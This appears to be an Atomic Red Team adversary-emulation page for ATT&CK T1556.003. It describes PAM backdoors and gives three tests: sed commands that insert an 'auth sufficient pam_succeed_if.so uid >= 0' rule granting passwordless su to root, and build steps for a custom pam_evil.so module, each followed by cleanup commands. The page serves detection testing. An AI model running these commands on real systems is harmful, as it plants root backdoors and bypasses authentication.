T1556.003 - Modify Authentication Process: Pluggable Authentication Modules

Description from ATT&CK

Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM) Adversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor) Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)

Atomic Tests


Atomic Test #1 - Malicious PAM rule

Inserts a rule into a PAM config and then tests it.

Upon successful execution, this test will insert a rule that allows every user to su to root without a password.

Supported Platforms: Linux

auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su-l| | pam_rule | Rule to add to the PAM config. | string | auth sufficient pam_succeed_if.so uid >= 0| | index | Index where the rule is inserted. | integer | 1|

Attack Commands: Run with
1
sh
! Elevation Required (e.g. root or admin)

1
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}

Cleanup Commands:

1
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}



Atomic Test #2 - Malicious PAM rule (freebsd)

Inserts a rule into a PAM config and then tests it.

Upon successful execution, this test will insert a rule that allows every user to su to root without a password.

Supported Platforms: Linux

auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su| | pam_rule | Rule to add to the PAM config. | string | auth sufficient pam_succeed_if.so uid >= 0| | index | Index where the rule is inserted. | integer | 8|

Attack Commands: Run with
1
sh
! Elevation Required (e.g. root or admin)

1
sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}

Cleanup Commands:

1
sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}



Atomic Test #3 - Malicious PAM module

Creates a PAM module, inserts a rule to use it, and then tests it.

Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.

Supported Platforms: Linux

auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su-l| | pam_rule | Rule to add to the PAM config. | string | auth sufficient /tmp/pam_evil.so| | index | Index where the rule is inserted. | integer | 1| | path_to_pam_module_source | Path to PAM module source code. | path | PathToAtomicsFolder/T1556.003/src/pam_evil.c| | path_to_pam_module | Path to PAM module object | path | /tmp/pam_evil.so|

Attack Commands: Run with
1
sh
! Elevation Required (e.g. root or admin)

1
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}

Cleanup Commands:

1
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}

Dependencies: Run with
1
sh
!

Description: The PAM development library must be installed to build the PAM module
Check Prereq Commands:
1
if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi
Description: The PAM module must exist on disk at specified location (#{path_to_pam_module})
Check Prereq Commands:
1
if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}